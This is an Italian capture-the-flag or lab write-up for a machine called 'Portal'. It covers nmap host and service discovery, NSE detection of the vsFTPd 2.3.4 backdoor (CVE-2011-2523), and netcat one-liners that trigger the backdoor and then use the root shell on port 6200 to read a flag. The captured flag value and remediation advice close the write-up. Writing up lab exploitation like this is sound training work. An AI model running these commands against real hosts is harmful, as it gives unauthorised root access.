
Una dettagliata guida al penetration testing e report di sfruttamento per la macchina 'Portal', incentrata su CVE-2011-2523 (backdoor di vsFTPd 2.3.4) per ottenere accesso root.
⚠️ Questo progetto è solo per scopi educativi e di test autorizzati.
L'accesso non autorizzato ai sistemi è severamente vietato.
SYAFIQ
Ruolo: Penetration Tester Capo
| Fase | Strumento | Descrizione |
|---|---|---|
| Scoperta | Nmap | Scansiona la rete per host attivi |
| Enumerazione | Nmap | Identifica servizi e versioni |
| Analisi | NSE Script | Rileva vulnerabilità conosciute |
| Sfruttamento | Netcat | Attiva backdoor |
| Post-Sfruttamento | Terminal | Ottieni accesso root e recupera flag |
Scansiona per host attivi nella rete:
nmap -sn --unprivileged 10.150.150.10-30
✅ Risultato:
-8 host rilevati
-Target identificato: 10.150.150.12
Scansiona porte e servizi aperti:
nmap -Pn -F --unprivileged -sV 10.150.150.12
✅ Risultati:
-Porta 21 → FTP (vsftpd)
-Porta 22 → SSH (OpenSSH 8.2p1)
Verifica la presenza della vulnerabilità backdoor FTP nota:
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12
🚨 Risultato:
-Il Target è VULNERABILE
-CVE-2011-2523 confermato
Attiva la backdoor usando un nome utente malevolo:
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21
⚡ Questo apre una shell root nascosta sulla porta 6200
Connettiti alla backdoor ed esegui comandi:
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200
Accesso root ottenuto
uid=0(root) confermato
🏁 Flag Catturata:
5ee499eb5d0b8e4269b13483e57adaa0b3815f48
-🛡️ Raccomandazioni
-🔄 Aggiorna il servizio FTP all'ultima versione
-🚫 Disabilita servizi non necessari
-🔐 Usa un firewall per limitare l'accesso
-📊 Esegui audit di sicurezza regolari
-📚 Disclaimer
❌ NON utilizzare questa conoscenza per attività illegali.
“La sicurezza non è un prodotto, ma un processo.”
— Testa, monitora e migliora sempre.